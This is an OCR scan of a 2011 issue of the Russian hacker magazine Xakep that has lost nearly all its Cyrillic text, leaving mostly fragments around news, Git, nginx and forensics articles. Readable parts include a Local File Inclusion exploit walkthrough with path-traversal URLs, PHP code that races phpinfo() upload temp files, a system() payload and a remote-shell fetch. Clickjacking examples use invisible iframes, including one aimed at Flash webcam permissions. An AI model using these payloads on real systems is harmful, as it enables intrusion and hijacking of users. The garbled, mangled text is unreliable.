- IPv6 - www.epidemz.net

Xakep 12_2011


Xakep journal


  • MEGANEWS SN

    -

    soNv ~

    S 100

    PlayStatio N etwok,

    . S Music 8500 .

    [iJ , , Sony. Sony (, GeoHot ),

    , . , ,

    , 7 1 PlayStation Netwok, Sony Ente r tai nment Netwo r k Sony Online Entertainment . 60 PSN/SEN SO E. , n , - .

    . Sony, 0,1 % . 93 ,

    , . , . , Sony ,

    . , . :)

    AHTBPYCMICROSOFT SECURIY ESSENTIALS

    PWS:Wi32/Zbot Google Chome. . , :).

    001.

    ,

    .

    , 121 .

    , , . 9% .

    15 ekko. ekko 30 .

    WP7 105 ANDROID ((~~

    Windows Phone 7

    m , iOS Andoid . - - ,

    . Apple Google o r a , , , . , . , Microsoftoe

    . , Windows Phone 7

    , Wi-Fi

    , . . Microsoft , , . ,

    , WP 7.5.

  • MEGANEWS GGL I : Ggl Buzz, Google Labs, GoogleCode Search Jaiku.

    EDIFIER

    Edifier

    17 :

    2356740 . - - .

    Ed ifier AudioCady 2 IMP17) . . , US- F-,

    , SD , ! US-). 17 . 2,4 RMSI

    , . Ed ifier 17 AUX. ,

    F-. 1300 . Edifier 17 .

    , IN,S . , GPS . , . 006

    MICROSOFT -

    Microsoft, , . , Wld, - Rustock. Microsoft- Kelihos ! lu) 42-45 . Kelihos - . , , DDoS-aa,

    >> . Microsoft >>. Microsoft ,

    . Kelihos 2011 ,

    . -, ,

    . sikhl--

  • MEGANEWS , DRM .

    ? , !

    m Vigilant Defende. Vig il ant Defende , - Deus : Human Revolut ion . , , . ,

    , ,

    . . , , . , 24% ,

    , 25% , . , , . -

    , , , $30-40 [ , Deus : Hu man Revo lution $60).

    , ORM .

    WEXLER.BOOK 6002. WEXLER WLR.6002, 6001 . 6.0" PEARL,

    . 4 , 50- 36 . , .

    - 1500 mAh, WEXLER.BOOK 6002 .

    -5 990 .


    900

    . Deus : Human Revolution

    .

    .

    eBayl ~ , , .

    . (20. ,

    [NATS).

    , . ,

    >>. , ,

    . , .

    . NATS , , . , .

    -, .

    ~ ~ , PAYPALOT

    . , . ,

    - . PayPal , ,

    2,4 3,4% . .

    12/155/2011


  • MEGANEWS FACEBOOK . .

    RIW-2011 &,

    rn : RIW -. , . ,

    ESET, . ,

    , Wikileaks.

    . , Positive Technologies n , n >> -

    . RIW-2011 .

    , , RIW 2011 -

    - .

    , .

    - RIW-2011 >> , : . !

    71 / - '- 18 / , 8 /- . 010

    - RIW2011, :

    , , , ,

    , , .


  • 7

    BUFFALO MINISTATION PLUS

    6

    n Buffalo's Backup Utility

    n n n Windows. , n

    Time Machine, n

    05 .

    Buffalo MiniStation Plus Manage, n -

    . n :

    .


    Buffalo MiniStation

    Plus n n 1 . n n n

    n , .

    TurboPC TurboCopy n

    n n n n USB 3.0 n

    n n .

    nn n AES 256 . n

    n n

    Secue lockMoile .

    USB 3.0

    n USB , : , n

    n , n n

    n . n n :

    USB.

    RAMDISK RAMDISK - Buffalo

    n n -

    . ,

    ,

    n n.

    n .


  • MEGANEWS THEWALLSTREET JOURNAL, Photobucket - .

    n .

    ,

    .

    , , , . , dt R,

    . , , , ,

    . , .

    . , , . , , . ,

    , - . , , ,

    - Mafia Was :1.

    'al:~e ,t!irate :

    30 - ,

    30- [ ! . an

    . , , . Roland OG, ,

    30- iMode la $977 [ 3 0- !. ,

    , , , , , ,

    .

    . , , , ,

    - . , , , .

    NGIX , 27 100 hm .

    50 50

    nn.

    Belgacom Telenet 11 ,

    n The P i a te .

    RUNA CAPIAL 3 - NGINX,

    . n 43

    .

    LibeOffice

    n n Apple iOS Google Android.


  • ~~ ~~ ~~~6I LTE.

    1 So,t~~~--o. .. .~~ ........ _

    -2d2-- .

    ~~ . :1

    D Chaos Compute Club ICCC) . , ,

    ->>. , , , ,

    . . , , , , . ,

    , .

    , , , > .

    IE 9 - , Microsoft.

    92% URL- 8% .


    S deurrig .

  • MEGANEWS 9TOSMAC , IPAD 2 Smat v ..

    SPYEYE

    ~ SpyEye ... -.. - -- __ .... --

    -...... .......---

    1 - .... ... - 1

    SpyEye SS ,

    n .

    Tustee , SpyEye . ,

    : SMS , - . it-

    , - ,

    , . , - , , . : SpyEye

    . , , .

    , , . ,

    , 51 -.

    , ,

    .

    GS-

    . . ,

    "( - v 5/- .

    HAKOMbTECb-DART GGL

    Google

    ,

    - Dat ldatlag . g].

    DART , , -

    . JavaScipt. , D a t JavaScipt,

    . , , BSD. Dat . , .

    , Web lspecto Dat -. ,

    Dat , - ,

    . , Dat JavaScipt.

    Dat Dat . Google

    Dat Chome , , Google Chome 05.

    : , .

    , .

    , . . Dat- , ,

    . .

    , D at - Google. 2006 Google We b Toolkit,

    - Java . , , Adwods Google Wave . Google Web Toolkit .

    Dat, Google ...

    Dat , , . Dat

    , , Google

  • EUROPEAN SECURITYTEAM 6, , , %.

    CHROME

    Jt su ('rn)

    GOOGLE ,

    , Google , . , , Chome. , Chome Remote Desktop, -.

    Windows, 05 Linux, hm-. Chome Remote Desktop - Chome. ! - , , . lno

    ! . - , .

    Google , - ,

    , . , Google Chome , -.

    WebRTC IReal Time Communicationsl, - . Google , WebRTC

    - , -

    Chrome >

    ()! nn, ICOII.tepy oroporo r I'IOAIQ'IO&cn.c, IGtO{J(V '. ocryn kOt.O>IOepy' n ' OCJ'YIW.

    n

    n Chrome '

    [1). r n n w, nepealle f Q.....-..

    4615 2551 7896

    n r .

    . ,

    . , WR Mozilla. , Goog le Mozilla , .

    , Google mViw

    , WebRTC. Google , Chome.

    , WebRTC , : iSAC iLBC

    , - Google V8 . chomium . og ,

    2- libjingle, UDP Google.

    PseudoTcp- libjingle, . SSL-. potobuf IPotocol Buffesl.

    PARKER INGENUITY

    ,


    PARKER 5 TECHNOLOGY PARKER , .

    k STH Techology , , .

    , , , .

    ,

    . k

    lgeu ity k STH Technology; ,

    . k lnguit :

    , . ,

    ,

    .


  • HEADER

    ,

    ? ,~ , . . - -, Loggly, Spluk

    - . . ,

    , syslog/syslog-ng, . ,

    -, n. -. -, . -,

    . , , : - - >>. standaloe-aao Loggly, , Gaylog [www. gaylog2.og/about l,

    , MongoBD

    . , - Logeplica [ dklab.u/

    li/dklab logeplica l. , .

    ? : Log eplica SSH , . , , , , , . -

    . . n : syslog/syslog-ng?, Logeplica

    . , n - .

    ? , - [ ].

    -, . , [n ssh-keygen -t sal ,

    [ssh-copy-id ootramachine-to-be-pulled]. Logeplica

    [/etc/dklab_logeplica . conf], , - , :


    # ,
    destination = /var/log/cluster

    # ( )
    skip_destination_prefixes = /var/log : /var/lib/pgsql/data/logs

    #
    scoreboard = /var/run/dklab_logreplica.scoreboard
    delay = 0.25

    # ~
    user = root

    # -,
    #
    [files]
    /var/log/{messages,maillog}
    /var/log/httpd/*_log

    # ,
    [hosts]
    first=machine1.example.com
    [email protected]

    . - dklab_logeplica. init /etc/init .d

    . /etc/init.d/dklab_logeplica stat>>, logeplica .

    ? , >> [ www.denwe.u l, [ logeplica

    l]. :::

    dklab_logreplica 1 dklab_logreplica.pl fj 100755 459 line' (402 elocl 11.112 k

    usetrict; ue fcntl ~(:DE~t!l.! :tloc.kJ; use to::Select; F1le::Fat.h;

    u flle::htiii.DI!; lt! /Oeu;Jpt::LoQq: u tl1~:st: :IO!S ~(Jid5_Mat :

    dJrla_logreplla: ;athtr lOQ3 trc. .ultlple ~r.o~chlllt!s 1ntO ont place 1n t-elltUit.\11" . ""Ver1on: 1.10, 20110'27\n

    ";\\:t.or:

  • Co lliJasintsovl

    # hacker tweets ~~ rajmj:

    Facebook, . .

    raDidierStevens: feelpDennisRitchie); pOennisRitchie = NULL; //:-1

    El : - . , , Lisp .

    raox6D6172696F: . - >.

    it.ly/ l bsue . : , , Chome,

    la Google). coss-oigin policy!

    , , , ;).

    $5000

    : -

    El : . , , .

    , : > .

    ... #nomoefeebugs


    raFishermansEnemy: CISSP,

    Metasploit.

    rastackSmashing: -2147483647

    l ntege.

    : live. xakep.u/biog/Hack/2147.html .

    El : . , w- . ,

    .

    rastamparm: Google "'

  • HEADER

    Proof-of-Concept

    , . , .

    - .

    , , t [tcpcypt.og ],

    .

    ? . t . ,

    >>: . - ,

    . t .

    , .

    . t,

    , , .

    t?

    ? (github.com/ sobo/tcpcypt ) , . ,

    (Windows, 05 , Linux, FeeBSD) .

    : (4500 ) uselandeoa (7000 LoC).

    n

    , netsf. i f . , , t .

    ni- : ,

    70000 60000

    .!!! 50000 "' 40000 fj Q) 30000

    Generate random master key 20000 ~~~~~~

    client server

    () 10000

    serve

    n . .

    ? 79% t :).

    , n.

    (lntenet Daft) , , ( n : Ql.L ly/tyvGxs). ,

    ,

    ? ( n , NAT), , . ,

    t - ( VPN-cepepa).

    , ( 36 SSL) .

    , .

    - t? ,

    I- . :::

    19,153

    tcpcrypt server

    737 SSL

    server

    tcpcrypt : - ,

    SSL 82 . tcpcrypt !


  • ! IGROUP i GROUP-IB,

    , no . GROUP-IB.

    Group-18 ,

    . , .

    Group-IB

    n ! 2 2011 - >> I)

    _ _ , ' . -k USB Flash _ ' , . dd l ) w . - ' ' , -

    ' .

    n: ?

    ' ? ? - ?

    LINUX n :

    : :

    000 >> 3 2011

    : 6n -3 2011 l -

    >> 000 " , -- > - ynp L ux

    ' 1 i\ n - .

    n . - n -

    1 . n n ?

    ? ' n 2. .. ~

    oil ... ? n

    w ovo

    .

    n n . n n n .

    n n contestlagroup- ib.ru n >>

    n .

    ! !


  • COVERSTORY , , Group-18

    1

    , ! , DDoS,

    , ...

    - . ,

    . ,

    .


    , , ,

    .

    ,

    , , ,

    .

    , ,

    . !) . ,

    ,

    ,

    .

    ,

    , ,

    . . 11

    , . , : , . ,

    , , .

    2) , ,

    .

    . l

    . , DLP . DL- . .

    4) ,

    -. ,

    .

    . ,

    , , . 11 ,

    , , :

    , .

    .

    .

    , , ! , IPS, DLPI. ,


  • Caine- Computer Aided INvestigative Environment

    . -, .

    ,

    .

    .

    21 , , , : , , , ,

    , .

    ,

    . ,

    . - .

    Linux:

    Caine [http:Uwww.caine-live.net/l, Riplinux [ http:Uip. 7.de/cuent/l .

    , CD\DVD US-, .

    ~

    1

    ,

    .


    2

    , ,

    ~

    .

    3 ,

    .

    :

    I- 8.8.8.8, 000

  • COVERSTORY , n , Group-IB

    , ; [, ]; , . : ,

    . ., 12345.

    [], DVD, US-, SDHC. Seagate, 3750330NS, 1 23.

    \Uss\\Dumnts\ NQ1 NQB n .tt>>.

    n n Q\P 2010, 6221, n

    , nn n n > n n .

    , :

    n [, , ] ; [, ]; n ;

    n n, .

    compiled options:

    !

    : ,

    653 . MicoSDHC, n Tanscend, 16 ,

    1234 567. n -

    lntenet l n .

    command line: dc3dd if=/dev/sda of=/mnt/image.dd
    device size: 41943040 sectors (probed)
    sector size: 512 bytes (probed)
    875462656 bytes (835 M) copied ( 4%), 4.53218 s, 184 M/s
    [!!] writing to '/mnt/image.dd': No space left on device
    886243328 bytes (845 M) copied ( 4%), 4.63351 s, 182 M/s

    input results for device '/dev/sda':
       1730944 sectors in
       0 bad sectors replaced by zeros

    output results for file '/mnt/image.dd':
       1730152 sectors out

    dc3dd failed at 2011-10-19 12:56:41 +0000

    # dc3dd if=/dev/sda of=/mnt/image.dd

    dc3dd 7.0.0 started at 2011-10-19 12:57:06 +0
    compiled options:
    command line: dc3dd if=/dev/sda of=/mnt/image.dd
    device size: 41943040 sectors (probed)
    sector size: 512 bytes (probed)
    1179648 bytes (1.1 M) copied ( 0%), 1.01073 s, 1.1 M/s

    n RIP Linux


    , : n \COMP1\HDD1\IE US - , n

    ADATA, 1234.

    , : n

    n n n n ;

    n n, -, - . n n;

    , , .

    , n n n.

    [, -n], n n n n, n n , n n n . , n .

    :

    , :

    n , DL , n

    . DLP, ,

    n n. . n n

    . n , , . ,

    , , .


  • : DDOS

    , :

    , - - > .

    -. -,

    . - (], ,

    .

    , 5-1 . .

    , .

    . . , , .

    ,

    , , : ], .

    , : 1)

    . 2)

    . )

    , .:::!:

    SONY , ,

    [Screenshot: AccessData FTK Imager showing the evidence tree of an NTFS volume, the NTFS access control entry properties and a file list]

    , :

    .

    , ,

    , ,

    ( ] .

    .

    lc ],

    , .

    , , , .


  • COVER STORY


  • & 1994 .

    ' . 2000

    , 11 .

    2002 ~l web-cep~ep QI ,

    45 .

    .

    2011 $~: Ngix i . . .

    ~ n .

    NGINX

    gi

    n , , 1.:;.1 ,

    ?

    &l ~ . ,

    [ ] -, 18 . 1987

    , , -,

    . , - .

    >> , ,

    , . : , Yamaha ! MSX]. , , 1. , - .

    n ~ 1.:;.1 ,

    ?

    &l ~ - AV>>,

    1989-1990 . , - 100 . ,

    , : , >>, >> ,

    . , - . , . : , . -

    , 1992- , .

    1994 ,

    , .

    7 , 2000 .

    NASDAQ, ,

    .

    - XXL.RU, ,

    , 13 2000

    .


  • COVERSTORY

    r.1 .... ?

    l . ~

    : , ,

    , , ,- Apache. , mod_gzip

    , mod_deflate, Apache 1.3.

    mod_poxy. ,

    , - .

    mod_accel- Apache . 2001 .

    r.1 .... ,

    ?

    l , . Mod_defl~te _ ~ ,

    , . , , , . 2001

    -, Apache. ,

    , . -

    , , , , , .

    Apache- , . :

    Apache , . gi Apache . , , nginx .

    Apache: ,

    , . , - , . - , , : nginx n . ,

    - 2002 nginx.

    r.1 ....

    ? ?

    l 2003 npo n ~ , , , nginx

    n .


    Rate.ee, . , , . nginx mamba.u zvuki.u, 3.

    2004 ft . m.u, , ,

    nginx ,

    . , , ,

    , , . , , . - 2004 , ft.m.u ginx.

    4 2004 , ,

    : 0.1.0.

    r.1 NGINX .... ,

    ?

    l ~ .

    . ngix . nginx , . , , nginx,

    , ,

    . ,

    . .

    r.1 , .... , ,

    ?

    l - ~ . ,

    - . , ginx n >>,

    , ,

    . nginx, , . -,

    n , , -, .

    r.1 ~, LIGHPD .... , .

    l n: ~

    -, n nginx . nginx

    . ,

    nginx

    nginx. , nginx -.

    lighttpd (lighty]. - , nginx,

    . - (Jan Kneschke]. , - , , .

    , , . , lighttpd FastCGI. 2000-2001 , , Apache: , l, Python.

    lighttpd - , FastCGI . lighttpd FastCGI . 2000 : .

    r.1 ... NGINX ?

    l ~ . ~ - . ng1nx

    - - no FastCGI WSGI. Apache-

    , nginx ,

    n FastCGI. , , nginx, Apache. : nginx

    , .

    , ?

    1 , , ~ Apache nginx? ,

    , . Apache ,

    - , , mod_php. , 100 , , , 100 .

    : 1 , , - . 100 , , / (10 /].

    , 1 . ,


  • , Apache 10-20 .

    , , Apache , , . , . i gi Apache, :

    gi , Apache, , . gi , --

    , , l

    Apache, .- . .).

    - , , gi

    - gi ,

    .

    .

    1 , - ~ ,

    , - . Apache, gi - !- . ,

  • COVER STORY

    r.1 : ~ NGINX.

    ? . ?

    l , n. , ~ , ,

    n . , n n , .

    , : n .

    , , n n n BSD,

    n . nginx , . , nginx

    , Rate.ee zvuki.u.

    r,1 ~ NGINX? l - ~ ,

    . , .

    , , ,

    , . .

    Linu-: CentOS, Ubuntu.

    , , . :

    - , , , .

    ?

    l - . ~

  • ng1nx - ngix,

    . , , , -, .

    .

    gi.

    - (Netcaft, 2011): 64.67%"'"'

    keep-alive .

    @ 15.660/ -0.07% ,

    Ngix

    .

    8.54/ +o.s1%

    gi

    -. 100 000 000 000 000

    2002 2004

    2011 gi $3

    : .

    gi

    87 912 .

    .

    2011 1.0 gi

    70+ .

    gi hiig!

    Rate.ee - ,

    gi.

    8 gi

    security advisoies.

    3 gi

    .

    .

    .

    - gi

    43 000 000

    gi :

    "' Ram 1!111 II.I!M

    ulu .: ~WORDPRESS @

    t. ic Dropox

    :

    .......

    SOU!IS


  • COVER STORY

    !r!AOE IN Cfi!

    i


    R_T_T

    ,

    - -

    . , . ,

    , ,

    .


  • ,

    D ltel ( 2007 ]

    ,

    S-. , , ,

    1. AMD


    ,

    . ,

    , . ,

    . , ,

    , ,

    .

    . ....:=--------------cvn . . ..

    ~IA/)~

  • COVERSTORY

    86. ,

    ,

    . .

    , - , , - .

    , , - .

    , . ,

    , [ l - .

    , , , - . , ,

    , ltel

    , ...

    : , , -

    , , lntel. , - ? : Assemed Canada, - Assemied China.

    , -

    VII\OJI

    '1.0 s.

    -----

    2. lntel


    , , n . , , , ,

    . n

    : n ,

    . , >>, >>,

    >>, , .

    , lntel . ,

    5000, . , 631xESB/632xESB 1/0 Contolle Hub,

    - , 2007

    . , . ,

    -: ,

    ,

    . [BMCI -

    . , - ,

    ~11"-.~ /3 ""PT'j . ..w 3 .~ ~i

  • , lntel .

    ,

    . .

    : lntel 5000 ,

    - ,

    . - lntel , ,

    .

    - , - , , ,

    , ,

    .

    >> - lntel,

    , >>. , .

    ,

  • COVERSTORY

    , . . , . , -

    . , ,

    . , : , .

    , .

    , ltel .

    , , 7, 11- ,

    ! -

    !. , 11

    , V- .

    , .

    11- , , , .

    , , -

    . , , , 11- . , !

    , - ,

    , . , . , ,

    , - .

    - - ,

    , . , .

    , ,

    ltel, , ,

    , . - .

    , . , , .

    -, .

    , .

    . ,

    ------------------ -------------------

    , , .

    , .

    US-, ,

    , . l. 31.

    , ,- , .

    -

    !. . 41. - , ltel, , .

    . ltel. ,

  • .

    , .

    , .

    , , ,

    ,

    . , ,

    , .

    , , ,

    . , , . .

    . . ,

    , .

    ,

    , , , , .

    , , , ,

    . ,

    , . , , .

    , . - ,

    - , . , , ,

    , ,

    . , - , ,

    -? , ?


    , , . , .

    , [ ,

    ). , , , , . 86, , ,

    . , ,

    , . , ,

    . .

    , : . - ,

    . -, -,

    ,

    .

  • COVERSTORY poma lpomawkelagmail .co,;,l

    I LFI

    phpinfo[) . .

    LFI-ATAKY


    phpifoll 10% .

    J!hi!,.ng! - ; bjt i/q LFI; bjy/ccFHcYphpinfoll ; it.ly/omkMVP LFI phpinfoll

    RDot; it.ly/YP9LE BWMeter; bjy/eS4GxW Procmon.

    . ,

    , .

    PERL ,

    .

    , , local lile i clude, ,

    . . , . , , .

    LFI, .

    . -: , - local lile inclusion ... php.ini - , ? , - , ! LFI -aa ,

    , - n.

    LFI: 1. [, , . .l.

    [ , !.

    2. 1/apache/logs/eo.log, /va/log/access_log, // self/envion, /poc/self/cmdline, /poc/sell/ld/X !.

    , , . n CG I

    / , .

    3. nn [data:, php://input, php://fi l te l, allow_ul_include=On [n-0111 >= 5.2.

    4. 1/tmp/sess_*./va/li/php/session/1. , .

    5. . S n www-, [ ./v/sl/ maill .


  • tm-

    , LFI (/tmp/php*, C:\tmp\php*l . / :

    LFI-; phpinfo(l; - n Windows (

    !; > 5.2.0.

    n ( , - , !: 1. - h-n phpinfo[J,

    (tmpl . 2. phpinfo[J

    seed ! ! . .

    (, Content-Lengthl, L

    4. tm- LFI.

    . . , :

    http://site.com/css.php?file=style.css
    http://site.com/css.php?file=../../(...)/etc/passwd

    , css.php:

    n , , n , . *nix Windows:

    http://site.com/css.php?file=../../../../../etc/passwd
    http://site.com/css.php?file=../../../../../tmp/
    http://site.com/css.php?file=../../../../..\Windows\Temp\


    phpinfo

    - tm -

    PHPINFO() n n phpinfo[J. n

    , n php.ini , n .

    n : 1. upload_tmp_di-peea ,

    . (NULLI, Envionment.EMP.

    2. file_uploads-a n upload_tmp_di ! n n Onl. . upload_max_filesize-aca .

    ( 10 l, n 2 .

    4. max_execution_time-acaoe n . , , n , n . :-1

    5. session.seialize_handle-cepaaop . -h ( !.

    , phpinfo[J n , n Vesion 5.3.8.

    $_FILES n n ( RFC1867I: 1. . 2. n - .

    . tm- n . 4. . 6. - . 7. nn -. 8. l nu ( ! . 9. - n , .

    3, 4, 5, 6, 7 tm- , n 8 . -n $_FILES, n nn

    move_uploaded_file[J. , n

    n, , . n,

    , cleanup. , ,

    , , n . , -n ( _* ob_stat, ob_flush !, , n 8 9,

    n . n


  • COVER STORY

    DOS LFI + PHPINFO[] _FILES, , . . , - ?

    ? . . ,

    30 , , . ,

    . ( + ) .

    . , . . S-- file_upload php.ini.

    , . phpinfo(],

    tm- , , LFI , cleaup . ,

    , . , ?

    , LFI , . >- , . , . , , . , . :1 :

    Cotet-Legth [ );

    [, ------------BWvJ N Ml.

    , : 1. . 2. [ ). 3. ,

    .

    2 , . , , , , ,

    .

    ,

    . phpinfo[l .

    [phpifo.php, info.php, i.php . .), G elwaux [ ). , . . Vaiaes phpifo[)


    PHPINFO[]

    n - phpinfo(l , .

    , .

    , n n , phpinfoll: 1. , / , ; 2. dumnt_t-,

    ; 3. _lg - [ LFI); 4. safe_mode [default OFF)- ; 5. open_basedi [default mt)- ,

    ; 6. allow_ul_fope [default ON)- URL

    ; 7. allow_ul_include [default OFF) - ;

    . magic_quotes_gpc [default OFF) - ;

    9. egiste_globals [default OFF)- ; 10. disae_functions [default empty) -

    ; 11. max_execution_time [default 0)-

    ; 12. display_eos [default OFF) - ; 13. upload_tmp_di-y tm-. 14. [cul, sockets, zip . .); 15. : _G ET, _POST, _COOKI E,

    FILES, _SERVER.

    : _GET, _POST _FILES. [

  • phpinfo

    ! Administrator: C:\Windows\ System32\cmd.exe

    t ~ tll ,, J ' ' ' 1 1 1, t 1 ' ' ; ~ ' ' - ~ \ ') l \.' 1' i '~ ' j 1 1 '1 ! 1' 1 ; ~ 1; "- ..,_

    J { l t 1 '1' 1 f ' - ' ' ' : J 1 1 - 1:1'' '.

    w

    \ .TMP

    = C:\Windows\Temp ( upload_tmp_dir php.ini), = php (sessio.ser.ialize_handler), = .

    , Windows , :

    phplAE.tmp phplAF.tmp php;t.A4~.tmp

    *nix mkstemp [linux.die.net/man/3/mkstemp):

    / = / tmp,_ = php (session.seria1ize_handler), =. (seed += PID). . glibc

    :

    - t_ime () - gettimeofday().sec

  • COVER STORY

    , . , , ,

    -. , phpifoll , .

    1000000*36 , .

    . , Micosoft-IIS/7. 5 /5.3.8 .

    Widows-cepepa css.php LFI:

    phpinfo.php:

    , tm-:

    - S- - :

    // Evil
    $file = "-----------------------------XaXbXaXbXaXbXa\r\n";
    $file .= "Content-Disposition: form-data; name=file" . rand(0, 100) . "; filename=\r\nfile" . rand(0, 100) . ".txt\r\n";
    $file .= "Content-Type: text/plain\r\n\r\n";
    $file .= "\r\n";
    $file .= "-----------------------------XaXbXaXbXaXbXa\r\n";
    $post = $file;
    $req = "POST " . $target . " HTTP/1.0\r\n";
    $req .= "Host: " . $host . "\r\n";
    $req .= "Content-Type: multipart/form-data; boundary=---------------------------XaXbXaXbXaXbXa\r\n";
    $req .= "Content-Length: " . strlen($post) . "\r\n";
    $req .= "Connection: Close\r\n\r\n";
    $req .= $post;

    :

    $tmp = '';
    $html = '';
    $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    socket_connect($sock, $host, );
    socket_write($sock, $req);
    while ($out = socket_read($sock, 65536)) {
        $html .= $out;
        if (preg_match_all('#=> (.*)#', $html, $r) && !empty($r[0][2])) {
            $tmp = str_replace(array("=> ", ' '), '', $r[0][2]);
        }
    }
    socket_close($sock);

    $html phpifo, $tmp- tm-. :

    $tmp_hex = $tmp;
    if (strpos($tmp_hex, ':')) {
        $path = explode(':', $tmp_hex);
        $tmp_hex = $path[1];
    }
    $tmp_hex = ($tmp_hex && preg_match('#php(.*)\.tmp#', $tmp_hex, $rd)) ? $rd[1] : '';

    $tmp_hex seed . - . . Content-Length ! , ! :

    $req = substr($req, 0, strlen($req) - 2);
    retname($host, $req);

    n . , n .

    $tmp_hex +1 LFI. ? , . , , , - , .

    . +2, +3 . . , ,

    , tm-, 1 100.

    LFI . -:

    http://site.com/css.php?file=../../../tmp/php7xEkH&e=system('dir')

    :

    php expl.php step4 ../../../tmp/php7xEkH.tmp http://site.com/s.txt

    here your shell : http://site.com/8149.php

    expl.php- , .

    , phpinfoll . , Live, magic_quotes=o ./supe . Windows-aax , i*- BWMete . ,

    - - . , . ::


  • Preview PCZONE

    IPV6:HOWTO 50 ~ 1Pv4 .

    . 1Pv6! , . I . ~

    , . .

    / ? NAT 1v4-.

    1Pv6,

  • PCZONE

    5 , ves i on1, ve sion2, ve sion2a,

    . ,

    . , hello wold ,

    . 15 ,

    , - Git !


    GIT? Git- ,

    , Linux. : n , n n n . Git'a n .

    : Git , .

    , , , - . , , , , , , IDE. -

    . .

    Git

    , , , . Linux git . ' , , n - git-osx-installe. Windows

    , ) - ). Git

    Windows, , , . Git . GitG Git, IDE git, , ,

    . Git . commit. n. commit , ) ). n

    :

    git config --global user.name "Your Name"
    git config --global user.email "your@email.com"

    , :

    git config --global color.diff auto
    git config --global color.status auto
    git config --global color.branch auto


  • commit

    n commit'a:

    git commit -m "initial commit"

    - > - staging commit . Git staging

    . :

    git commit -am 'update to index.php'

    git status . . commit, ,

    . , , . , ,

    >, - , - .

    git branch 1 git checkout n , . : n , ,

    . , , . Git ,

    . banch,

    , , .

    git branch

  • PCZONE

    Add return ln the offset support tests lf the d ls not present ln fra ... ... meset docs

    Browsecode

    tlmmywll authored 2 days ago 1 parent 52afe20860 commit 969fcc16bc5ab77352407f77cd48860ca4d95434

    Showing 1 changed file wlth 6 addltions and deletlons.

    s rc/support . js 6

    src/support. js Vlow fllo@ 969fccl

    266 266 267 267 268 ~

    2 269 275

    '' -266,6 266,12 @@ jQuery.support (f~~ctio~() {

    + +

    + + +

    +

    11 Reconstruct container d document.getlementsByagName("ody") [ O]; if ( Iody ) {

    /1 Return for frameset docs that don't have d 11 These tests cannot done return;

    container document.createBlement ("div"); 270 ?71

    276 277

    container.style.cssext v + "width:O;height:O;position:static;top:O;marginop: " + conarqinop + " " ; ody.insertefore( container, ody.firstChild );

    r

    , banch , :

    git branch experimentalBrunch

    , n Git l - mst- l.

  • , . open souce>> , Sign Up>> . ,

    n SS-. , -, ! u) Gitu-. Puic Keys>> Add anothe puiic key>>. .

    n SSH , . , , . , . - l help . github . com/woking-withkey-pass-phases ) .

    git clone Git , GitHub- .

    , - , l, , - , ). GitHub . jQuey. Gitu-, clone URL>>. URL , l Git-

    ) n, clone:

    git clone git://github.com/jquery/jquery.git

    Git jquery . , - n gitk -all>>.

    git push .

    git, . ' GitHub

    I), . , -

    . GitHub puiic clone URL>> , , pesonal clone URL>> . GitHub .

    git remote add origin git@github.com:aburgess/My-First-GitHub-Repo.git
    git push origin master

    . oigi pivate clone URL>>. - git-push- maste oigin l. . GitHu.

    , . Gitu- .

    git pull push' , git pull , . : git fetch ! ) get mege l ):

    git fetch upstream master
    git merge upstream/master


    Git&GitHub:

    mitsuhiko (Armin Ronacher)

    lm.ti~ICI>ve-

  • PCZONE

    CLICKJACKING: , , , : , ? ,

    . ,

    , -

    .

    .

    , -

    - .

    : www.sectheory. com/clickjackjnq.htm: www.contextis. com/resources/ white-papers/click-klna;

    ~ com/201 0/paoers/ J!Z1J!!!f; www.owasp.org/ index.pho/Cijckjack ing.

    . n.

    CLICKJACKING? ,

    . click jackig , - >> . , , ! ?

    L- , : -

    ; L- ,

    ; L- ,

    z - i d ex .

    , L- ! ,

    , iframe, , . iframe

    - , .

    , , iframe, SS- opaci ty


  • facebook ~

    Girl who had sex with 5000 men 1 1 Uk l Wall lnfo Glrl

    Securlty Oleck ,

    Warning! Due to the increased number of spam bots putting extra load on our servers, please verify that you are a real HUMAN. Follow the instructions below to proceed.

    Click buttons in this order: 3, 1, 2

    1 2

    ""

    z-idex. , , . , , , .

    (55-- .

    ? clickjacking-apyo.

    , , :

    chtml> chl style= "text-alig:ceter" >owo yw style=" fot-size: 38;" >! r> !/> cdiv style= "z-idex:le; opacity:e; positio:absolute; top:epx; " > ciframe scrolling="no" style= "width:eepx; height:seepx;"

    src= "http://www .g.com/search?q=buy+kidle+amazo" > ! - - iframe -->

    href= "#" >Ka ?/>

    , Bing'a.

    . , - . , , , Retwit Like,

    , . , .


    HIXOIICA n

    r

    ni -i l'tOI'IHOCO lframe

    anK corn

    " ns.

    100 200

    .nn , :s n Next.

    i.

    , , - - ?

    , -, . , , -,

    - WodPess . , . - WodPess'o, ,

    . , lnstall Now [, , Fiefox). . http://wordpress/wp-admin/

    plugin-install.php?tab=plugin-informatio&plugin=wp-galleryremote, plugi

    . , ifame

    lnstall Now. - . , , [ ). . , [ zi-)

    URL: http://wordpress/wp-content/plugins/.

    . , ? - . -

    . , 51idePress, 55- . , .

    [ n ) [secuity-assessment.com ). WordPess 3.1.3 2011 .

    [- l), clickjacking-aa. .


  • PCZONE

    (i! 11@) C:\Usrs\ ondrew\ 0 ~ C:\Usrs\ ondrew\ Dosktop\s ... L ..J WordPress.org Login Page In Frame

    This content cannot displayed in frame help protect the se

  • - . .

    function refreshSettings(timeout) {
        window.setTimeout(function () {
            $('#settings').empty().append($('<iframe allowtransparency="true" src="https://www.macromedia.com/support/flashplayer/sys/settingsmanager2.swf?defaultTab=privacy">'));
            setSettingsVisibility();
        }, timeout);
    }

    Adobe JavaScipt-o, ifame. SWF-

    - . , , ? : ) (www. fe oss.og/webcam -spy), ',

    ' Fiefox Safai, GitHub (github.com/ feoss/we bcam - spy). ,

    z-index opacity SWF-, ifame. , ,

    Adobe . . ( ), -

    WordPress ~"'~1ack Exploit vl ~----=--::- -

    d~ Flash~ Player Settings anager

    Website Privacy Settings F'or "~bses u hu\~ 11lrcd V\Sttc.-d. \ tc\\ or ltnn 1l1c pn\a )' scLtan '$ for necc. to your mcro :md 1 or nttcrophot1c.

    A11vays ask @ Always allow QAJways deny Visited wes es Privacy Wesrtes () loss.org

    Flash Player 'a

    Delete all sites

    Wied Gizmodo , Flash .

    ? , , , SQLi , , XSS.

    (, , ). , . , clickjacking'a

    - ( ), . FieFox NoScipt

    ( addons . moz ill a . og /r u /fire fox/addon/nosc r ipt ) . ClearCiick

    , . , . I

    White Hat Secur1ties i :: . - t . .

    ' +

    -----

    -----

    -----

